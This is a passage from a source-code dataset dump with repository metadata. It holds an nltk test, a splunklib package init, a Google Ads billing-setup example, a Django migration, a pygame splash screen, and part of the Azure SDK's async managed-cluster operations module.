model_view, query, sort=sort, limit=limit, skip=skip
)
return get_data_list(list_data)
| 40.085965 | 120 | 0.59403 |
ace95421dcca1ded7e403f7f9b5db7d0276e983f | 210 | py | Python | .venv/lib/python3.10/site-packages/nltk/test/unit/test_freqdist.py | plocandido/docinfrati | ad563c93efed1d6909a7650d299cac9adf8a1348 | [
"MIT"
] | null | null | null | .venv/lib/python3.10/site-packages/nltk/test/unit/test_freqdist.py | plocandido/docinfrati | ad563c93efed1d6909a7650d299cac9adf8a1348 | [
"MIT"
] | null | null | null | .venv/lib/python3.10/site-packages/nltk/test/unit/test_freqdist.py | plocandido/docinfrati | ad563c93efed1d6909a7650d299cac9adf8a1348 | [
"MIT"
] | null | null | null | import nltk
def test_iterating_returns_an_iterator_ordered_by_frequency():
samples = ["one", "two", "two"]
distribution = nltk.FreqDist(samples)
assert list(distribution) == ["two", "one"]
| 26.25 | 63 | 0.680952 |
ace954a02bc3dd64a3db5a55338fc3325274ec96 | 400 | py | Python | bin/api_connector_splunk/splunklib/modularinput/__init__.py | CyberGRX/api-connector-splunk | 7f1db1cecb7ae367c1882c3188dc9f8bcb6bc4c6 | [
"MIT"
] | 495 | 2015-01-18T01:51:24.000Z | 2022-03-30T21:41:25.000Z | bin/api_connector_splunk/splunklib/modularinput/__init__.py | CyberGRX/api-connector-splunk | 7f1db1cecb7ae367c1882c3188dc9f8bcb6bc4c6 | [
"MIT"
] | 611 | 2020-11-04T21:35:28.000Z | 2022-03-31T14:06:08.000Z | bin/api_connector_splunk/splunklib/modularinput/__init__.py | CyberGRX/api-connector-splunk | 7f1db1cecb7ae367c1882c3188dc9f8bcb6bc4c6 | [
"MIT"
] | 367 | 2015-01-06T05:30:16.000Z | 2022-03-30T21:48:29.000Z | """The following imports allow these classes to be imported via
the splunklib.modularinput package like so:
from splunklib.modularinput import *
"""
from .argument import Argument
from .event import Event
from .event_writer import EventWriter
from .input_definition import InputDefinition
from .scheme import Scheme
from .script import Script
from .validation_definition import ValidationDefinition
| 30.769231 | 63 | 0.835 |
ace9581fce3da511b01b7bd3617494eaac4d6886 | 10,346 | py | Python | examples/billing/add_billing_setup.py | pandemonium0225/google-ads-python | 46ec5e253c949d97822a1446018718f29f10e2d7 | [
"Apache-2.0"
] | null | null | null | examples/billing/add_billing_setup.py | pandemonium0225/google-ads-python | 46ec5e253c949d97822a1446018718f29f10e2d7 | [
"Apache-2.0"
] | null | null | null | examples/billing/add_billing_setup.py | pandemonium0225/google-ads-python | 46ec5e253c949d97822a1446018718f29f10e2d7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example creates a billing setup for a customer.
A billing setup is a link between a payments account and a customer. The new
billing setup can either reuse an existing payments account, or create a new
payments account with a given payments profile. Billing setups are applicable
for clients on monthly invoicing only. See here for details about applying for
monthly invoicing: https://support.google.com/google-ads/answer/2375377.
In the case of consolidated billing, a payments account is linked to the
manager account and is linked to a customer account via a billing setup.
"""
import argparse
from datetime import datetime, timedelta
import sys
from uuid import uuid4
from google.ads.googleads.client import GoogleAdsClient
from google.ads.googleads.errors import GoogleAdsException
def main(
client, customer_id, payments_account_id=None, payments_profile_id=None
):
"""The main method that creates all necessary entities for the example.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID.
payments_account_id: payments account ID to attach to the new billing
setup. If provided it must be formatted as "1234-5678-9012-3456".
payments_profile_id: payments profile ID to attach to a new payments
account and to the new billing setup. If provided it must be
formatted as "1234-5678-9012".
"""
billing_setup = _create_billing_setup(
client, customer_id, payments_account_id, payments_profile_id
)
_set_billing_setup_date_times(client, customer_id, billing_setup)
billing_setup_operation = client.get_type("BillingSetupOperation")
client.copy_from(billing_setup_operation.create, billing_setup)
billing_setup_service = client.get_service("BillingSetupService")
response = billing_setup_service.mutate_billing_setup(
customer_id=customer_id, operation=billing_setup_operation
)
print(
"Added new billing setup with resource name "
f"{response.result.resource_name}"
)
def _create_billing_setup(
client, customer_id, payments_account_id=None, payments_profile_id=None
):
"""Creates and returns a new billing setup instance.
The new billing setup will have its payment details populated. One of the
payments_account_id or payments_profile_id must be provided.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID.
payments_account_id: payments account ID to attach to the new billing
setup. If provided it must be formatted as "1234-5678-9012-3456".
payments_profile_id: payments profile ID to attach to a new payments
account and to the new billing setup. If provided it must be
formatted as "1234-5678-9012".
Returns:
A newly created BillingSetup instance.
"""
billing_setup = client.get_type("BillingSetup")
# Sets the appropriate payments account field.
if payments_account_id != None:
# If a payments account ID has been provided, set the payments_account
# field to the full resource name of the given payments account ID.
# You can list available payments accounts via the
# PaymentsAccountService's ListPaymentsAccounts method.
billing_setup.payments_account = client.get_service(
"BillingSetupService"
).payments_account_path(customer_id, payments_account_id)
elif payments_profile_id != None:
# Otherwise, create a new payments account by setting the
# payments_account_info field
# See https://support.google.com/google-ads/answer/7268503
# for more information about payments profiles.
billing_setup.payments_account_info.payments_account_name = (
f"Payments Account #{uuid4()}"
)
billing_setup.payments_account_info.payments_profile_id = (
payments_profile_id
)
return billing_setup
def _set_billing_setup_date_times(client, customer_id, billing_setup):
"""Sets the starting and ending date times for the new billing setup.
Queries the customer's account to see if there are any approved billing
setups. If there are any, the new billing setup starting date time is set to
one day after the last. If not, the billing setup is set to start
immediately. The ending date is set to one day after the starting date time.
Args:
client: an initialized GoogleAdsClient instance.
customer_id: a client customer ID.
billing_setup: the billing setup whose starting and ending date times
will be set.
"""
# The query to search existing approved billing setups in the end date time
# descending order. See get_billing_setup.py for a more detailed example of
# how to retrieve billing setups.
query = """
SELECT
billing_setup.end_date_time
FROM billing_setup
WHERE billing_setup.status = APPROVED
ORDER BY billing_setup.end_date_time DESC
LIMIT 1"""
ga_service = client.get_service("GoogleAdsService")
stream = ga_service.search_stream(customer_id=customer_id, query=query)
# Coercing the response iterator to a list causes the stream to be fully
# consumed so that we can easily access the last row in the request.
batches = list(stream)
# Checks if any results were included in the response.
if batches:
# Retrieves the ending_date_time of the last BillingSetup.
last_batch = batches[0]
last_row = last_batch.results[0]
last_ending_date_time = last_row.billing_setup.end_date_time
if not last_ending_date_time:
# A null ending date time indicates that the current billing setup
# is set to run indefinitely. Billing setups cannot overlap, so
# throw an exception in this case.
raise Exception(
"Cannot set starting and ending date times for the new billing "
"setup; the latest existing billing setup is set to run "
"indefinitely."
)
try:
# BillingSetup.end_date_time is a string that can be in the format
# %Y-%m-%d or %Y-%m-%d %H:%M:%S. This checks for the first format.
end_date_time_obj = datetime.strptime(
last_ending_date_time, "%Y-%m-%d"
)
except ValueError:
# If a ValueError is raised then the end_date_time string is in the
# second format that includes hours, minutes and seconds.
end_date_time_obj = datetime.strptime(
last_ending_date_time, "%Y-%m-%d %H:%M:%S"
)
# Sets the new billing setup start date to one day after the end date.
start_date = end_date_time_obj + timedelta(days=1)
else:
# If there are no BillingSetup objecst to retrieve, the only acceptable
# start date time is today.
start_date = datetime.now()
billing_setup.start_date_time = start_date.strftime("%Y-%m-%d %H:%M:%S")
billing_setup.end_date_time = (start_date + timedelta(days=1)).strftime(
"%Y-%m-%d %H:%M:%S"
)
if __name__ == "__main__":
# GoogleAdsClient will read the google-ads.yaml configuration file in the
# home directory if none is specified.
googleads_client = GoogleAdsClient.load_from_storage(version="v10")
parser = argparse.ArgumentParser(
description=("Creates a billing setup for a given customer.")
)
# The following argument(s) should be provided to run the example.
parser.add_argument(
"-c",
"--customer_id",
type=str,
required=True,
help="The Google Ads customer ID.",
)
# Creates a mutually exclusive argument group to ensure that only one of the
# following two arguments are given, otherwise it will raise an error.
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"-a",
"--payments_account_id",
type=str,
help="Either a payments account ID or a payments profile ID must be "
"provided for the example to run successfully. "
"See: https://developers.google.com/google-ads/api/docs/billing/billing-setups#creating_new_billing_setups. "
"Provide an existing payments account ID to link to the new "
"billing setup. Must be formatted as '1234-5678-9012-3456'.",
)
group.add_argument(
"-p",
"--payments_profile_id",
type=str,
help="Either a payments account ID or a payments profile ID must be "
"provided for the example to run successfully. "
"See: https://developers.google.com/google-ads/api/docs/billing/billing-setups#creating_new_billing_setups. "
"Provide an existing payments profile ID to link to a new payments "
"account and the new billing setup. Must be formatted as: "
"'1234-5678-9012-3456'.",
)
args = parser.parse_args()
try:
main(
googleads_client,
args.customer_id,
args.payments_account_id,
args.payments_profile_id,
)
except GoogleAdsException as ex:
print(
f'Request with ID "{ex.request_id}" failed with status '
f'"{ex.error.code().name}" and includes the following errors:'
)
for error in ex.failure.errors:
print(f'\tError with message "{error.message}".')
if error.location:
for field_path_element in error.location.field_path_elements:
print(f"\t\tOn field: {field_path_element.field_name}")
sys.exit(1)
| 42.228571 | 117 | 0.688382 |
ace95925b02ca6e79bc2808102df4574a00a7eb0 | 565 | py | Python | ToDo/migrations/0003_auto_20200608_1458.py | chumbajr/todoapp | eeccfb1c40d2b7111d0d96c60315e2b16ea86984 | [
"MIT"
] | 1 | 2020-07-13T08:57:52.000Z | 2020-07-13T08:57:52.000Z | ToDo/migrations/0003_auto_20200608_1458.py | chumbajr/todoapp | eeccfb1c40d2b7111d0d96c60315e2b16ea86984 | [
"MIT"
] | 8 | 2021-03-30T14:05:23.000Z | 2022-01-13T03:00:33.000Z | ToDo/migrations/0003_auto_20200608_1458.py | chumbajr/todoapp | eeccfb1c40d2b7111d0d96c60315e2b16ea86984 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-06-08 14:58
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('ToDo', '0002_auto_20200606_0929'),
]
operations = [
migrations.AlterModelOptions(
name='todo',
options={'get_latest_by': 'start_time'},
),
migrations.AlterField(
model_name='todo',
name='start_time',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
| 23.541667 | 74 | 0.60354 |
ace95994b62bc5ad7af7c4c79d4f181cd38e8251 | 2,359 | py | Python | src/world/logosplashworld.py | alisonbento/steering-all | 99797f99180dd64189ea5ed85ff71b66bfd9cf6f | [
"MIT"
] | 3 | 2016-10-10T18:34:55.000Z | 2017-08-02T15:18:28.000Z | src/world/logosplashworld.py | alisonbento/steering-all | 99797f99180dd64189ea5ed85ff71b66bfd9cf6f | [
"MIT"
] | null | null | null | src/world/logosplashworld.py | alisonbento/steering-all | 99797f99180dd64189ea5ed85ff71b66bfd9cf6f | [
"MIT"
] | null | null | null | import dotworld
import ufrnsplashworld
from src.define import *
from src.dot.entities.dotpairg import DotPairg
from src.dot.dottext import DotText
import i18n
_ = i18n.language.ugettext
class LogoSplashWorld(dotworld.DotWorld):
def __init__(self):
dotworld.DotWorld.__init__(self)
self.counter = 0
self.limit = 400
self.alpha = 0
self.animState = 1
self.logo = DotPairg()
self.label = DotText("PAIRG - Physical Artifacts of Interaction Research Group", 16, (0, 0, 0), (255, 255, 255))
self.sublabel = DotText(_("Developed by") + " Alison Bento", 16, (0, 0, 0), (255, 255, 255))
def onAttachScreen(self):
self.logo.setMedium()
self.logo.centerX(self.screen.width)
self.logo.centerY(self.screen.height)
self.logo.createSurface()
self.label.centerX(self.screen.width)
self.label.marginTop(dotget(1))
self.label.below(self.logo)
self.sublabel.centerX(self.screen.width)
self.sublabel.marginTop(dotget(1))
self.sublabel.below(self.label)
def changeAlpha(self):
self.logo.setDotAlpha(self.alpha)
# self.logo.createSurface()
self.label.surface.set_alpha(self.alpha)
self.sublabel.surface.set_alpha(self.alpha)
def listen(self, inputResult):
if inputResult == GameDefine.COMMAND_EXIT:
self.screen.turnOff()
if inputResult == GameDefine.COMMAND_BOOST:
self.pause()
def step(self):
if self.active:
self.changeAlpha()
self.logo.draw(self.screen.displaysurf)
self.label.draw(self.screen.displaysurf)
self.sublabel.draw(self.screen.displaysurf)
self.counter += 1
if self.animState == 1:
self.alpha += 2
if self.alpha > 255:
self.animState = 2
self.counter = 0
if self.animState == 2:
self.counter += 1
if self.counter > self.screen.fps * 3:
self.animState = 3
if self.animState == 3:
self.alpha -= 2
if self.alpha <= 0:
self.pause()
else:
self.screen.setWorld(ufrnsplashworld.UfrnSplashWorld())
del self
| 28.768293 | 120 | 0.581602 |
ace95a0e20a3f35f4602847566bef5410ece9fdc | 54,887 | py | Python | sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_04_01/aio/operations/_managed_clusters_operations.py | kazrael2119/azure-sdk-for-python | 485dd7b1b5ac41c1a5b9991e402b4035b55f437a | [
"MIT"
] | 1 | 2022-03-09T08:59:13.000Z | 2022-03-09T08:59:13.000Z | sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_04_01/aio/operations/_managed_clusters_operations.py | kazrael2119/azure-sdk-for-python | 485dd7b1b5ac41c1a5b9991e402b4035b55f437a | [
"MIT"
] | null | null | null | sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_04_01/aio/operations/_managed_clusters_operations.py | kazrael2119/azure-sdk-for-python | 485dd7b1b5ac41c1a5b9991e402b4035b55f437a | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._managed_clusters_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_access_profile_request, build_get_request, build_get_upgrade_profile_request, build_list_by_resource_group_request, build_list_cluster_admin_credentials_request, build_list_cluster_monitoring_user_credentials_request, build_list_cluster_user_credentials_request, build_list_request, build_reset_aad_profile_request_initial, build_reset_service_principal_profile_request_initial, build_rotate_cluster_certificates_request_initial, build_update_tags_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ManagedClustersOperations:
"""ManagedClustersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerservice.v2020_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.ManagedClusterListResult"]:
"""Gets a list of managed clusters in the specified subscription.
Gets a list of managed clusters in the specified subscription. The operation returns properties
of each managed cluster.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ManagedClusterListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedClusterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ManagedClusterListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.ContainerService/managedClusters'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ManagedClusterListResult"]:
"""Lists managed clusters in the specified subscription and resource group.
Lists managed clusters in the specified subscription and resource group. The operation returns
properties of each managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ManagedClusterListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedClusterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ManagedClusterListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters'} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.ManagedClusterUpgradeProfile":
"""Gets upgrade profile for a managed cluster.
Gets the details of the upgrade profile for a managed cluster with a specified resource group
and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedClusterUpgradeProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterUpgradeProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedClusterUpgradeProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_upgrade_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get_upgrade_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedClusterUpgradeProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/upgradeProfiles/default'} # type: ignore
@distributed_trace_async
async def get_access_profile(
self,
resource_group_name: str,
resource_name: str,
role_name: str,
**kwargs: Any
) -> "_models.ManagedClusterAccessProfile":
"""Gets an access profile of a managed cluster.
Gets the accessProfile for the specified role name of the managed cluster with a specified
resource group and name. **WARNING**\ : This API will be deprecated. Instead use
`ListClusterUserCredentials
<https://docs.microsoft.com/en-us/rest/api/aks/managedclusters/listclusterusercredentials>`_ or
`ListClusterAdminCredentials
<https://docs.microsoft.com/en-us/rest/api/aks/managedclusters/listclusteradmincredentials>`_ .
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param role_name: The name of the role for managed cluster accessProfile resource.
:type role_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedClusterAccessProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterAccessProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedClusterAccessProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_access_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
role_name=role_name,
template_url=self.get_access_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedClusterAccessProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_access_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/accessProfiles/{roleName}/listCredential'} # type: ignore
@distributed_trace_async
async def list_cluster_admin_credentials(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.CredentialResults":
"""Gets cluster admin credential of a managed cluster.
Gets cluster admin credential of the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CredentialResults, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.CredentialResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CredentialResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_cluster_admin_credentials_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_cluster_admin_credentials.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CredentialResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_cluster_admin_credentials.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/listClusterAdminCredential'} # type: ignore
@distributed_trace_async
async def list_cluster_user_credentials(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.CredentialResults":
"""Gets cluster user credential of a managed cluster.
Gets cluster user credential of the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CredentialResults, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.CredentialResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CredentialResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_cluster_user_credentials_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_cluster_user_credentials.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CredentialResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_cluster_user_credentials.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/listClusterUserCredential'} # type: ignore
@distributed_trace_async
async def list_cluster_monitoring_user_credentials(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.CredentialResults":
"""Gets cluster monitoring user credential of a managed cluster.
Gets cluster monitoring user credential of the managed cluster with a specified resource group
and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CredentialResults, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.CredentialResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CredentialResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_cluster_monitoring_user_credentials_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_cluster_monitoring_user_credentials.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CredentialResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_cluster_monitoring_user_credentials.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/listClusterMonitoringUserCredential'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.ManagedCluster":
"""Gets a managed cluster.
Gets the details of the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedCluster, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedCluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.ManagedCluster",
**kwargs: Any
) -> "_models.ManagedCluster":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedCluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagedCluster')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
